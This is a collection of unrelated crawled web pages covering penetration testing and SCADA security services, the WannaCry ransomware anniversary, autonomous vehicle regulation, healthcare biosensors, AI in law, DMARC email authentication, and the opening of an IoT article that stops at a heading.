The main objective of the pen test is to find the security weakness. It will also highlights if there’s a weakness in the company’s security policies. The insights from the simulated attack can be used to mitigate or patch the detected exploitable vulnerabilities. Penetration testing is sometime called as white hat attack, as because the good guys are attempting to break in. Organizations should perform pen test at least once per 12-15 months to ensure the security of the data.
Why Penetration testing services and Consulting?
For an organization, the most important factors is business continuity and the supporting services that ensure the business runs smoothly. Pentests will identify security gaps in the infrastructure and will provide advice to eliminate the identified threats. The pentesters/ethical hackers will share you the detailed report describing the tests and techniques that were executed by the team and also provide you the risk mitigation advice in the report.
1. What are the steps in Penetration testing?
Defining the scope and goals of a pentest, including the systems to be addressed and the testing methods to be used. Pentesters will gather preliminary information and understand the environment, system or application being assessed. The data is gathered as much as possible about the target. The information can be domain details, IP addresses, mail servers, network details, etc. The pentester would spend most of the time in this phase to gather the data, this will help further phases of the attack.
In this phase, the tester will interact with the target will use technical tools to gather further intelligence about the target. Pen tester will scan the website or system for vulnerabilities and weaknesses using the automated scanner that they can later exploit for the targeted attack.
Once the vulnerabilities and entry points have been identified, the pen tester begins to exploit the vulnerabilities typically by escalating privileges, stealing data, intercepting traffic, etc., to gain access. The ethical hacker will identify the ones that are exploitable enough to provide access to the target system.
The pen tester should ensure the gained access to the target is persistent. This kind of persistence is used by the attacker not to get caught while using the host environment for months in order to steal an organization’s sensitive data.
Report & Analysis:
Reporting is often the most critical aspect of the pentest. It will start with the overall testing procedures, followed by an analysis of vulnerabilities, risks and recommendations to mitigate. The findings and detailed description in the report helps you insights and opportunities to improve the security posture.
2. Types of Penetration testing
There is a wide variety of penetration testing and it can be categorized on the basis of either, the knowledge of the target or the position of the pentester. Each of the test option providing information that can dramatically improve the security posture of the organization.
Internal & External penetration testing:
If the test is conducted inside the network it is known as internal penetration testing and if it happens outside the network which is exposed to the internet then it is known as external penetration testing. It aims to find the vulnerabilities in the network infrastructure of the organization. The tester will be conducting firewall config test, firewall bypass test, DNS level attacks, IPS deception etc,.
Web Application penetration testing:
It comprehensively assess web applications for security vulnerabilities that can lead to unauthorized access. The pentester will leverage the OWASP security verification standard and testing methodologies. This test examines the endpoints of each web apps that a user might have to interact on a regular basis, so it needs to be well planned and time investment.
Mobile Application testing:
Mobile and mobile apps can be vulnerable and there might be a chance of data leakage. This test comprehensively assess the mobile and installed mobile applications in any platform (iOS, Android, windows, etc,) for security vulnerabilities. The tester will go beyond the looking at just API and web vulnerabilities to examine the risk.
It is designed to test employees adherence to security policies and security practices defined by the organization. It will uncover the vulnerabilities among employees in both remote test and physical tests.
Wireless Technology Assessment:
This test intends to assess the security of your deployed wireless devices in the client site. Usually, the test happens in the customer end. The hardware used to run pen tests need to be connected with the wireless systems for exposing vulnerability.
Embedded & IoT penetration testing:
It is to assess the security of your IoT and embedded devices by attempting to exploit the firmware, controlling the device or modifying the data sent from the device. In traditional pen testing the tester uses the windows or linux known as TCP/UDP protocols and applications. But when you switch to IoT, you have new architectures like ARM, MIPS, SuperH, PowerPC, etc,
3. Why us?
InfySEC's Penetration Testing company help Small and Medium Sized businesses quickly assess the security posture of their networks by safely identifying network and Application level vulnerabilities before they are actually exploited by attackers. InfySEC's security consultants use real-world scenarios to demonstrate the exploitation and how attackers can crack in to gain access confidential data, networks, systems etc., that impact the business functioning of the organization. We have an innovative set of way in which we carry out the penetration process. Need our help? Fill out the enquiry form or you call us now. | <urn:uuid:62f88367-7d61-4566-992c-43446af39aa1> | CC-MAIN-2022-40 | https://www.infysec.com/services/security-and-defense/penetration-testing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00355.warc.gz | en | 0.922646 | 1,197 | 3 | 3 |
WannaCry Ransomware Anniversary: What we know, Where we are
This time last year IT teams across the globe were working to mitigate the damage of the WannaCry ransomware attack by deploying patches, disabling SMBv1 and recovering files. On this anniversary, it is worth a reminder of the damage caused and how to avoid ransomware risks today.
What was the WannaCry Ransomware?
In May 2017, a new strain of the Ransom.CryptXXX (WannaCry) ransomware began spreading globally, affecting a large number of organizations. WannaCry encrypted data files and asked users to pay a ransom in bitcoins. The ransom note indicated that the payment amount would be doubled after three days. If payment was not made after seven days, the encrypted files would be deleted.
It was later learned that the bitcoin accounts were abandoned, and there never was an automated decryption process, so paying the ransom was pointless. Recovery from backups was, and typically is with ransomware, the best course of action.
How Did WannaCry Spread?
WannaCry had the ability to spread itself within corporate networks, without user interaction, by exploiting a known vulnerability at the time in Microsoft Windows. Computers which did not have the latest Windows security updates applied were at risk of infection.
According to Microsoft, “A month prior, on March 14 , Microsoft had released a security update to patch this vulnerability and protect our customers. While this protected newer Windows systems and computers that had enabled Windows Update to apply this latest update, many computers remained unpatched globally. As a result, hospitals, businesses, governments, and computers at homes were affected.”
How was WannaCry Stopped?
At the time, applying the most recent Microsoft patches to environments helped protect computers from WannaCry infections. Another immediate remediation plan was to disable the specific system protocol known as SMBv1 to mitigate the risk of infection in relation to WannaCry.
Lessons Learned from WannaCry?
Here are a few we can share:
Backups Enable Ransomware Recovery: In ransomware situations, backups (Eze Vault) are the only way to recover files from an attack. With WannaCry, there was no automated decryption process, so even if the ransom was paid files are not returned/decrypted.
Firms must conduct regular backups and test them to ensure a seamless and proper restore is possible.
Patch + System Updates are Critical: As Brad Smith, president of Microsoft, wrote, “As cybercriminals become more sophisticated, there is simply no way for customers to protect themselves against threats unless they update their systems. Otherwise they’re literally fighting the problems of the present with tools from the past.”
Firms should have a plan or patch management program to help ensure patches are applied in a timely manner.
Old Technology Can Be Dangerous: Helping WannaCry spread was outdated technology, including computers running the 16-year old operating system Windows XP (end of support: April 2014). As Smith noted, “It's worth remembering that Windows XP not only came out six years before first iPhone. It came out two months before the very first iPod.”
As WannaCry showed us, the risk of using legacy technology largely outweighs the benefits. By not upgrading, firms are potentially risking everything. As patches and bug fixes are no longer being provided, hackers have an unguarded entrance to access a firm’s environment. This not only increases the firm’s odds of being hacked, but also raises the gravity of ensuing damages should an incident occur. | <urn:uuid:07400ec6-55e8-4bae-abf9-4507c2f24155> | CC-MAIN-2022-40 | https://www.eci.com/blog/15941-wannacry-ransomware-anniversary-what-we-know-where-we-are.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00355.warc.gz | en | 0.955437 | 745 | 2.6875 | 3 |
Autonomous vehicles offer the potential for making streets safer, but currently face regulatory and safety challenges of their own.
Autonomous vehicles and drones have almost fully proven their potential value in various military uses, first in detailed simulated environments and more recently in real-world tests. They are even able to operate in swarms now, using sophisticated artificial intelligence to not only avoid running into each other, but to share workloads and quickly complete complex tasks.
But they are still a long way to becoming commonplace on residential and city streets. A lot of that is because if a drone messes up on the battlefield, there is little chance that any friendly troops will be injured. They are normally operating far from people, or even in contested territory held by an enemy. But if a self-driving car blows through a stoplight or veers off onto the sidewalk of a crowded city street, the results could be tragic, not just for its passengers, but also for everyone around it. So those of us who dream of being driven to work by our vehicles every morning, or having them scoot us back home in the evening while we nap, will have to wait a bit longer for that to happen.
Ironically, the potential for autonomous vehicles to make streets safer was cited as a key reason why The House Transportation Subcommittee on Highways and Infrastructure held a hearing last week on the use of automated vehicles. Entitled “The Road Ahead for Automated Vehicles,” the hearing featured testimony from state and local officials, industry representatives and safety organizations.
The hearing comes as the National Highway Traffic Safety Administration released a report with some sobering statistics about a spike in serious accidents across the country. According to the report, there were 31,720 vehicle fatalities in the first nine months of 2021, which was 12% more than in 2020 and the highest number of deaths on the road since 2006. Autonomous vehicles operating safely could drastically cut those numbers, although most committee members seemed skeptical that the technology was anywhere near being ready for mass deployment.
“We have seen disastrous consequences when automation technology is deployed haphazardly,” said Del. Eleanor Holmes Norton, chair of the subcommittee. “To maximize the road safety impact of AVs, we must ensure that these technologies are held to the highest possible safety standards.”
Norton may have been referring to a slew of bad news for the autonomous vehicle industry over the past couple weeks. First we got word that Tesla was recalling over 50,000 vehicles for running stop signs. But that followed news from one of Tesla’s primary beta testers, a man named Taylor Ogan, who shared footage of his Tesla on Twitter narrowly missing a delivery truck and almost veering into a roadside barrier while trying to navigate a series of busy streets. And finally, there were also reports of hundreds of incidents where autonomous vehicles were traveling at high speeds and then suddenly applied their brakes for no apparent reason. So it’s been a relatively bad time for testing autonomous vehicles.
Ariel Wolf, general counsel for the Autonomous Vehicle Industry Association, which represents Ford, Waymo, Lyft, Volvo, Uber and others, stressed that autonomous vehicles have the potential to make roadways much safer compared with having all human drivers. He also said that once autonomous vehicles were commonplace, that the average household could save an average of $5,600 per year on transportation costs. However, his vision requires that those households rely on shared fleets of autonomous vehicles, which may not be realistic in car-loving America.
Interestingly, most of the speakers agreed that one of the biggest drawbacks to autonomous vehicle deployment was a lack of federal regulations to govern the safety and legality of operating self-driving cars. Instead, vehicles must comply with state laws, so it’s quite possible that a self-driving vehicle operating in one state could suddenly become illegal when it crosses into another.
Iowa Department of Transportation Director Scott Marler, speaking on behalf of the American Association of State Highway and Transportation Officials, explained why the federal government needed to set unified policies that both states and industry could follow.
“It is vitally important that the federal government and specifically the USDOT [United States Department of Transportation] continue to join in supporting these national, regional, state and local efforts,” Marler said. “The federal government and the USDOT are uniquely positioned to facilitate and sustain a technically informed and objective collaboration effort. Federal leadership can ensure national consistency in systems engineering and architecture to guarantee interoperability and standardized levels of safety across state lines.”
If a national strategy governing the laws and regulations for autonomous vehicles could be hashed out, then speakers said that many of the local success stories regarding smart cars and delivery vehicles could start to spread across the country. One such story was shared by Martha Castex-Tatum, vice mayor pro tem and council member for District K in Houston, Texas.
In Houston, they have been using smaller autonomous and electric vehicles designed by Nuro, a company founded in 2016 that focuses on delivery vehicles and self-driving robots. Castex-Tatum said that the vehicles were a double win for her city because they can be operated safely using automation, and eliminate the need for more gas-powered vehicles on city streets.
“Houston is one of the first cities to see AVs conducting commercial delivery service, with the deployment of Nuro’s zero-occupant, electric AVs, and I am glad that my own District K was one of the first three zip codes where service launched,” Castex-Tatum said. “These vehicles are offering our residents more zero-emission options with lower speeds and smaller, lightweight vehicles. Since 2019, Nuro has delivered groceries, prescriptions and hot food in partnership with Kroger’s, Domino’s, CVS and the Houston Food Bank.”
The hearing, and especially the latest roadside fatality statistics, really hit home for me. Back when I had to make a long commute to work, I unfortunately got to see a lot of bad accidents involving tractor trailers, passenger vans, motorcycles, cars, buses and everything else. I narrowly missed out on becoming entangled in a major pile up on the American Legion Bridge that unfolded at full highway speeds about two car lengths behind me—and provided quite the early morning scare. I also escaped several minor near misses where drivers were not paying attention when changing lanes, or were too distracted to notice that traffic ahead of them (where I was sitting) had slowed to a stop.
Back when I was just starting out as a journalist, racing to the scene of bad and fatal accidents to collect information and take photos was part of my beat. Those accident photos were oddly popular and often landed on the front page, but it was a soul draining assignment. So yes, I have seen the danger that human error can cause when driving, which is why I have no reason to doubt the latest NHTSA statistics. I look forward to the day when people can have their vehicles safely take them wherever they need to go. I have no illusions that something like that will happen anytime soon, but if unified federal laws and guidance can speed up the process, then it’s something that we should all support.
John Breeden II is an award-winning journalist and reviewer with over 20 years of experience covering technology. He is the CEO of the Tech Writers Bureau, a group that creates technological thought leadership content for organizations of all sizes. Twitter: @LabGuys | <urn:uuid:4ca55874-ac6a-48b1-bc7f-ef71fc347bd5> | CC-MAIN-2022-40 | https://www.nextgov.com/emerging-tech/2022/02/could-smart-cars-finally-be-driving-towards-reality/361652/?oref=ng-next-story | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00355.warc.gz | en | 0.970004 | 1,531 | 2.796875 | 3 |
The rapid growth of biosensor technology can be attributed in large part to the healthcare industry. Biosensors have been used by hospitals for years to monitor patient status. These IoT devices monitor biological functions, giving doctors and patients insightful data for analysis.
Another advantage to biosensors is that they facilitate minimal invasiveness for measuring biological activity, such as blood oxygen levels. And what makes biosensors incredibly essential is that they can deliver a wealth of valuable biological information in real-time.
However, while a large segment of the biosensor technology market is in healthcare, other applications include wellness and fitness. In the works are color tattoos that measure blood sugar. Some of the many ailments detected by biosensors include sleep apnea, peripheral artery disease, and obstructive pulmonary disease.
Part of the mystique of biosensors is their ability to collect tremendous data for actionable medical analysis. These highly sensitive devices collect data at the molecular level, as certain molecules are linked to illnesses. Biosensors can also help doctors diagnose a patient's symptoms at a much faster rate than traditional methods. The main components of a biosensor are sensor, transducer, and electrons.
Healthcare and Biosensors
Developers of biosensors have put a strong focus on creating improvements for the healthcare industry. Hospitals have multiple uses for the technology, as it can monitor blood pressure, glucose levels, and heart rate. The technology is also useful for doctors conducting real-time diagnostic tests on patients.
Another feature of biosensors is how they integrate with digital pills. The patient digests the pill, which is then activated by stomach acid. Gilead has designed such a pill for HIV medication. Once ingested, the patient is notified on their smartphone, and the biosensors transmit that information to the cloud.
Digital pills can also monitor mental illness, as well as physical conditions. Otsuka Pharmaceutical has developed a digital pill to monitor depression, bipolar disorder, and schizophrenia.
Data Collection on Patients
The wide range of data biosensors capable of collecting data on patients has facilitated the adoption of wearable smart technology by healthcare organizations. Additionally, medical patches placed on a patient’s body can detect biological data, such as skin temperature and respiratory measurements.
Home Monitoring Kits
In recent years, home monitoring kits have been booming for biosensor manufacturers. These kits allow patients to self-monitor themselves on a daily basis. Diabetics, for example, use the kit to monitor glucose levels. The more information collected daily, the faster doctors can treat a patient's condition. Manufacturers are working on meeting the demand for smaller, less expensive, and more user-friendly biosensors for home use.
Home-monitoring is possible for many diseases, including cancer. It can even be used to help doctors ensure patients are taking their medication on schedule. Studies show about half of patients with chronic illnesses fail to follow their doctor's instructions, which can worsen health.
The Eventual Omnipresence of Biosensors
Growing demand among hospitals and patients for biosensors will likely make the technology available at a high percentage of medical facilities in the not-so-distant future. As biosensors continue to play a role in making healthcare more personalized, they will bring considerable improvements to the patient experience.
Smart devices of the future will include T-shirts that monitor multiple health parameters at once and deliver the gathered data through a phone app. Another new development on the horizon is a biosensor that measures drug concentration in blood or saliva. Doctors will help influence new biosensor developments by providing input to MedTech companies on the type of metrics they need to fine-tune diagnostic tests. | <urn:uuid:843809e1-edac-4155-8236-3bfaa77b6bae> | CC-MAIN-2022-40 | https://iotmktg.com/how-biosensor-technology-shapes-modern-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00355.warc.gz | en | 0.930777 | 764 | 3.203125 | 3 |
Over the years, machines have replaced humans to handle predictable tasks. Tasks like collecting money at toll booths, managing customer service calls, and even vacuuming your living room floor can now be completed by a machine. But so far, machines have left humans to take on unpredictable tasks that require creativity, problem-solving, and intuition based on human experiences.
As machines have become a part of everyday life, some folks have reasoned that robots could never replace what they do. I hate to break it to you, but artificial intelligence (AI) is now creating art and tech companies are raising millions to advance AI-powered solutions for symptom analysis and patient triage.
So, is it possible for AI to replace lawyers?
Today, machines have learned to carry out tasks we could hardly imagine 20 years ago. AI uses statistical patterns in data to improve the efficiency of many different work processes. All AI needs is data, and there’s plenty of it available in the legal field.
It is possible that AI will optimize the legal field and reduce the number of errors in cases. It is possible that human lawyers take on an overseer’s role and only problem-solve when things go wrong.
I’ve thought about this possibility a lot in my work creating an AI-powered immigration law chatbot. Most lawyers I’ve talked to about this think it’s impossible for AI to fully replace human lawyers, or that that moment is impossibly far off in the future. But why are lawyers so convinced that they can’t be replaced?
Psychology plays a role in our reluctance to accept robots
It could be the uncanny valley effect, which is the uneasy feeling you get when a non-human form such as an avatar, robot, or animation is just a little too realistic and lifelike. It’s called a valley because on one hill is cartoon-ish animation that is clearly non-human, like Fred Flintstone. On the other hill is a real-life human, or an AI Instagram model so lifelike that people are fooled into thinking it’s truly human.
In the middle is the uncanny valley. A good example of the uncanny valley is the creepy baby Billy in the short, animated film, Tin Toy, produced by Pixar in 1988. Another example is the 2009 computer-animated adaptation of Charles Dickens’s A Christmas Carol which was described as creepy and off-putting by critics.
The chasm between looking “almost human” and “fully human” leaves people feeling a sense of unease, strangeness, disgust, or creepiness. It is possible that human lawyers feel a sense of revulsion thinking about an AI lawyer taking their place.
It’s also possible that AI is taking too long to successfully complete the complex tasks required to be a good lawyer. This idea, that technology was advancing but then was just not good enough for a long time, is called the trough of disillusionment.
What is the trough of disillusionment?
Here’s the story behind it. Gartner, a technology research and consulting company, created what’s called the hype cycle to track emerging technologies. The hype cycle has five key phases and shows us how a technology or application will evolve over time. At one end of the hype cycle is the Innovation Trigger where potential technology breakthroughs start. At the other end is the Plateau of Productivity where mainstream adoption starts to take off
Somewhere in the middle is the Trough of Disillusionment. Lawyers see what AI has done in other fields, but implementations in the legal field have failed to deliver. The improvement of existing tech has stalled, and new tech isn’t readily available. Simply put, lawyers are unimpressed and think that legal tech has hit its limits.
Are the disillusioned lawyers with the creepy uncanny feeling right about the future of AI in the legal field? It’s possible, but there are a couple of things to consider before we write off robot lawyers for good.
AI lacks intuition to make decisions about the unknown
Machines are designed to strictly follow rules, they simply don’t have the intuition that humans use to make logical leaps. Human lawyers rely on experience and intuition to solve unknown problems and can make decisions. This is something computers can’t do right now, but that doesn’t mean it’s impossible.
When humans have incomplete knowledge, we make decisions based on intuition. Strong intuition is an admired trait in humans, but we’re often unsettled at the idea of a machine that can use intuition or less than complete data to make a decision.
Computers process enormous amounts of data to function. Given the right kind of data, it is possible that AI can actually make highly intuitive decisions. AI has no bias so it can make decisions based on every minute detail, observation, and influence. In fact, there are people who believe that it’s possible to train AI to make more intuitive decisions, and there are researchers at Aarhus University currently trying to combine our human intuition with an AI’s ability to quickly access troves of information.
Machines have been replacing human workers for centuries
While some believe that it’s impossible for AI to gain the human-like intuition needed to be a good lawyer, others think it’s simply impossible. I hate to be the bearer of bad news, but not too long ago, people thought it’d be impossible to replace the horse.
For centuries, horses were the backbone of modern civilization. Horses stayed in the labor force through many new technologies that threatened their standing. For example, telegraphs replaced long-distance delivery men on horseback and trains replaced cross country horse-drawn carriages. And still, horses did work on farms and hauled people around cities.
That is until the internal combustion engine hit the scene, and suddenly millions of American horses were unemployed.
Machines have also replaced humans over the decades. Buttons replaced elevator operators and the internet drove travel agencies out of business. Between 1990 and 2007, approximately 400,000 US factory jobs were lost to automation.
If you’re a lawyer you might be thinking, “A machine couldn’t do my job.” Well, don’t be so certain. And that’s coming from a lawyer.
AI is the ultimate student. With help from data – good data and lots of it – AI can carefully study how behaviors and contextual inputs result in progress towards a goal. AI runs millions upon millions of simulations to get very good at a particular task, and when taught correctly, AI can get good at just about anything you tell it to get good at. Including legal work.
The future of AI-powered lawyers may be closer than we think
According to a paper written by economists at MIT and Boston University, robots could replace about two million workers by 2025. While many of these lost jobs are in manufacturing and other jobs that inherently require more repetitive, linear tasks, it’s not outside the realm of possibility that AI continues to creep into the legal profession.
For now, human intelligence and artificial intelligence have one major difference — the why. AI can easily learn how anything can be done better than humans. But AI still doesn’t have the curiosity to ask “why,” which prevents machines from doing the most meaningful legal work. That isn’t to say curiosity isn’t in AI’s future.
I have long been interested in the use of artificial intelligence in the legal field. I combined my passion for the law and AI into the creation of a bilingual AI-powered immigration law chatbot, YoTengoBot. If you want to discuss the future of AI in the legal profession, let’s connect! If you’d like to learn more about what I’m building with AI and the law, check out YoTengoBot! | <urn:uuid:80236396-77e3-43fc-99ca-222c61b8c2ca> | CC-MAIN-2022-40 | https://www.ciocoverage.com/lawyers-think-robots-will-never-replace-them-heres-why-they-may-be-wrong/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00355.warc.gz | en | 0.950128 | 1,651 | 2.9375 | 3 |
Electrical SCADA | Oil-Gas SCADA | Transportation SCADA | Water SCADA | Chemical SCADA
Supervisory Control and Data Acquisition (SCADA) systems are used for remote monitoring and control in the delivery of essential services/products such as electricity, natural gas, water, waste treatment and transportation. This makes SCADA systems an integral part of a nation’s critical infrastructure. They are also crucial to the continuity of business.
Issues that you need to be aware of when considering SCADA security:
• Recent changes in SCADA systems have exposed them to vulnerabilities that may not have existed before. For example, the switch from using leased telecommunications lines to public infrastructure ie. public CDMA and GSM networks, the use of commodity computers running commodity software and the change from proprietary to open standards have meant that vulnerabilities have been introduced into SCADA systems.
• Effective network design which provides the appropriate amount of segmentation between the Internet, the company’s corporate network, and the SCADA network is critical to risk management in modern SCADA systems. Network architecture weaknesses can increase the risk from Internet and other sources of intrusion.
• There are no mechanisms in SCADA to provide confidentiality of communications. If lower level protocols do not provide this confidentiality then SCADA transactions are communicated “in the clear” meaning that intercepted communications may be easily read.
• Many SCADA systems give little regard to security, often lacking the memory and bandwidth for sophisticated password or authentication systems. As a result there is no mechanism to determine a system user’s identity or if that user is authorized to access. This allows for the injection of false requests or replies into the SCADA system.
• SCADA systems often lack a session structure which, when combined with the lack of authentication, allow the injection of erroneous or rogue requests or replies into the system without any prior knowledge of what has gone on before.
The threat of electronic or physical attacks on SCADA systems could come from a number of different sources. Following are some examples of threat sources:
• insider attack from employees or ex-employees who are disgruntled or for any other reason are a possible security threat;
• organized crime may be driven by financial incentive to penetrate SCADA systems;
• genuine mistakes made as a result of lack of training, carelessness or an oversight;
• terrorists who may be seeking to add electronic attack to their existing capabilities;
• generic Internet threats such as worms, trojans and viruses that infect systems on the Internet can also affect SCADA systems when they use the same software and protocols. This may not be the result of a deliberate attack, SCADA systems may be infected merely because they can be.
• recreational hackers, crackers and virus writers motivated primarily by the challenge and a fascination with technology;
• script kiddies who are primarily untrained and yet have hostile or thrill-seeking
intentions towards almost anything connected to the Internet;
• activists conducting publicity-seeking attacks; and
• corporate attackers that spy on competitors to gain a competitive advantage.
Scada-security.com has designed a specialized security offering for the SCADA/Process control environment. Our offer includes Penetration Testing , Risk Assessment Services and Risk Mitigation Technology.
Penetration Testing - The only way to know for sure how your network will perform under attack is to actually attack it. Scada-security.com team of certified security experts will launch controlled, non intrusive, simulated attacks against your designated network segments and prepare a report detailing what holes were found, how they were exploited, how much of a threat they are, and suggestions on how to fix them.
How does a penetration test work?
A penetration test starts with a large amount of research. Any data about your company and employees we are able to find will then be used to more effectively plan and execute attacks on your network. The next step in the test is to scan and footprint the network. Once we have gathered an appropriate amount of data, we begin attacking your network using many of the same tools that malicious hackers use. All research, footprinting, and attacking will start in a very quiet way, growing louder and more aggressive as the test progresses. This allows us to gauge what kinds of attacks your network will block, and which it will allow. By the end of the test, we will have collected enough information to prepare a report detailing everything we found, highlighting any points of concern, and how to improve your security.
Unlike some “penetration tests” performed by other security firms, Scada-security.com will go as deep into your network as you want. This makes the test very much more realistic, and provides a good deal more data about the real state of security throughout your network. In some cases, we will be unable to get beyond the network perimeter (a very good thing). Should this happen, we offer a variety of ways to continue the test via a secure tunnel, allowing us to bypass perimeter security without leaving any holes for attackers.
One of the most recently popular and difficult to secure vulnerabilities is the client-side attack. These attacks don’t target the network’s perimeter or any of its services, but instead targets your end users. Statistically, even with good training, and good perimeter defenses, these attacks will be successful a significant amount of the time.
Internal Penetration Testing.
The goal of an Internal Penetration Test is to simulate an attack by someone inside the organization. This attacker could be anyone who has access to any building or network in your organization. Typically, an organization’s network is weakest on the inside, precisely where these attackers will be. Our security experts will carry out such an attack, mainly targeting access control systems, wireless networks, and, optionally, physical security. In the end, you will know how an attacker would exploit the systems in your organization.
External Penetration Testing. An External Penetration Test aims to simulate an attacker outside your organization, who is also usually in a remote location. Such attackers may be malicious hackers from a few miles away, or a few continents away.
Custom Penetration Testing. If your needs are more specific than either of the above offerings, we would still like to help. Scada-security.com will work with you to test a specific system or set of systems. A good example of this is a new installation of IDS/IPS systems. In order to be useful, they need to be tuned, and tuning these systems can be difficult. It’s even more difficult without controlled attack traffic to reference. Scada-security can assist in this and many other situations. Contact us to see how we can help you.
Attaining a good security stance is never easy, but it is much more difficult when you don’t know where you currently are. A Vulnerability Assessment will help nail down exactly what areas are weak and where to devote resources. A Scada-security team of certified security experts can cover your organization from top to bottom, or only in the areas you feel that need help.
One of the newer risks to sensitive networks is the proliferation of cheap and easy-to-use wireless devices. Many times, people will bring in these unauthorized devices and attach them to the network without anyone knowing. And, without proper security settings (which are never there by default and rarely applied), they open the internal network to anyone within several miles. Even laptops with built-in wireless capability can be a threat when attached to your network. Scada-security’s team will find any rogue devices in your area and alert you to their presence.
Having strong security measures on the perimeter of your network is only the first step to having a good security stance. The best methodology is “defense in depth,” which says that any secure system should have good security measures in place throughout the system, not just in selected places. While most attackers are located outside your network, many attacks are actually executed from inside of vulnerable networks, where there are generally fewer defenses. Scada-security.com can perform scans of your internal networks to find any weak points and help eliminate them.
The perimeter of your network is the first line of defense against a world full of malicious hackers. The devices that make up the perimeter are often difficult to configure and rarely installed correctly. Scada-security will perform a scan of your network’s front line to verify the proper functionality of the devices. These scans are able to be performed as a single event, or as part of an ongoing verification of your network’s security.
At the core of every good security program is a well-written and current policy. The policy should drive all other parts of the security process, including technology purchases and implementations. A good policy will be a useful tool instead of a hindrance, allowing for easy fixes to existing problems, and preventing new problems from occurring. Scada-security.com can help you write a new policy, or shape up your existing policy.
Consulting - If your organization has security needs above and beyond our defined services, we offer consulting at an hourly rate. Contact us and let us know how we can help make your organization more secure.
Other members of our business group: | <urn:uuid:017f30b5-3cdf-489d-93dd-0dc64be4b250> | CC-MAIN-2022-40 | http://www.infosecpro.com/scada/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00555.warc.gz | en | 0.942227 | 1,924 | 2.8125 | 3 |
Learn Why It’s Important to Add DMARC Records for Your Business Domain
A DMARC record is a systematic email authentication tool that restricts unauthorized use of an organization’s domain to send emails. It only allows genuine senders and thus ensures stakeholders’ security from spoofing and phishing attempts by malicious actors.
DMARC, or ‘Domain-Based Message Authentication, Reporting, and Conformance’ is a free protocol and an open technological specification designed for email authentication. It is an email security tool used to protect one’s domain and authenticate emails’ safety by using DKIM (DomainKeys Identified Mail) and SPF (Sender Policy Framework) mechanisms. It will enable any domain owner to assure the security of their business email, and websites and protect their customers and other stakeholders from threats such as spoofing, phishing, and business email compromise attacks, and help you keep everything in order. The DMARC authentication method is deployed using a DMARC TXT record.
Implementation and Implications of a DMARC Record
It is crucial to know the answer to the question, ‘What is a DMARC record?‘ to understand the standard implementation of a dmarc. A DMARC record consists of a predefined set of rules constituting the DMARC authentication setup. DMARC records are published in the Domain Name Services (DNSs) of the domains that want to use them. This is what a DMARC txt record looks like:
Example: v=DMARC1; p=none; rua=mailto :firstname.lastname@example.org
The rules or policies in the DMARC DNS record included by the domain owners will apply to the emails from the domain. The primary purpose of the DMARC records is to allow email addresses that are essential to the organization and to help the email service provider understand and apply the DMARC approval policy against the messages that do not pass the DMARC authentication check and more.
DMARC allows email receivers to authenticate an incoming email address to verify if they are genuine or fake. The authentication result helps to take different actions like delivering, blocking, or sending them to the junk folder. This feature makes it easier for Internet Service Providers (ISPs) to identify threats like spammers or malicious actors and prevent customers from being bombarded with a huge number of malicious, fake, or spam emails. It will allow users to receive greater transparency for their businesses. One can use websites such as Cpanel, GoDaddy, Cloudflare, and Microsoft Office 365 to add and set up DMARC for your company.
Why Should You Adopt the DMARC System?
There are multiple benefits of adopting the DMARC system for your web site. Here are a few benefits of implementing DMARC:
- Reliability: Having an official DMARC txt record allows an organization to publish its list of approved parties. This action prevents unwanted and malicious parties from sending unauthorized emails from the organization’s domain.
- Transparency: DMARC reports let the organization know who sends emails from a particular domain. It increases transparency and visibility resulting in more traffic.
- Security: The email community is constantly updated about emails that fail to get authenticated. A policy for dealing with such messages helps the entire email process become more secure.
What Comprises DMARC Policies?
Using a DMARC setup will give the organization the advantage of setting up its policy and defining the parameters against which it would want its email servers to handle all emails that fail the DMARC approval. In case of an authentication failure, DMARC will apply one of the following three basic policies to the email:
- p=none: This neutral policy does not involve taking any action regarding failed messages and only sends reports. It is merely used to monitor results and gather DMARC reports to analyze the data of the entire process.
- p=quarantine: Applying this policy, whatever messages that fail the DMARC approval checks are sent to quarantine which could be transferred to spam or junk folders. It indicates that the email receiver will transfer the emails to a junk folder or spam folder, which the user can recover later if desired. This feature is helpful when the user has some idea of the emails but would like to verify the messages that do not qualify to be 100% sure.
- p=reject: DMARC rejects and blocks whatever messages fail the authentication when this policy is applied. If this is implemented at the SMTP level, the incoming messages will bounce directly upon sending.
DMARC Record Check
Companies or individuals can use a free DMARC generation tool to create a DMARC record for your website that works. Such tools will help one view records, test them out, and verify their validity. Checking a DMARC record is a straightforward process. You only need to provide the tool with your domain name. Then it will display the DMARC record along with other information.
SPF, DKIM, and DMARC records are crucial advancements in the development of email authentication in the email security world. While an SPF Record and a DKIM record are components of the DMARC system, it provides a feature that they both do not, i.e., reporting. Thus, you can quickly get valuable, comprehensive reports of the emails associated with a domain and subdomains using a DMARC record. | <urn:uuid:b5f56b2a-1bbb-45dc-bb33-a1efade5bb75> | CC-MAIN-2022-40 | https://dmarcreport.com/dmarc-record/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00555.warc.gz | en | 0.906185 | 1,098 | 3.015625 | 3 |
Whether you are a future-minded CEO, tech-driven CEO or IT leader, you’ve come across the term IoT before. It’s often used alongside superlatives regarding how it will revolutionize the way you work, play, and live. But is it just another buzzword, or is it the as-promised technological holy grail? The truth is that Internet of Things (IoT) Applications isn’t just one thing, but a methodology of planning, implementing, and using technology to achieve a wide-ranging list of benefits.
Table of content
- IoT applications
- What is the Internet of Things?
- 9 Specific IoT applications
Combined with other technological disruptors, such as 5G, automation, and machine learning, the IoT transforms the way we do business and go about our lives.
So with that in mind, let’s take a deep dive into IoT and some of the practical applications already making an impact today.
What is the Internet of Things?
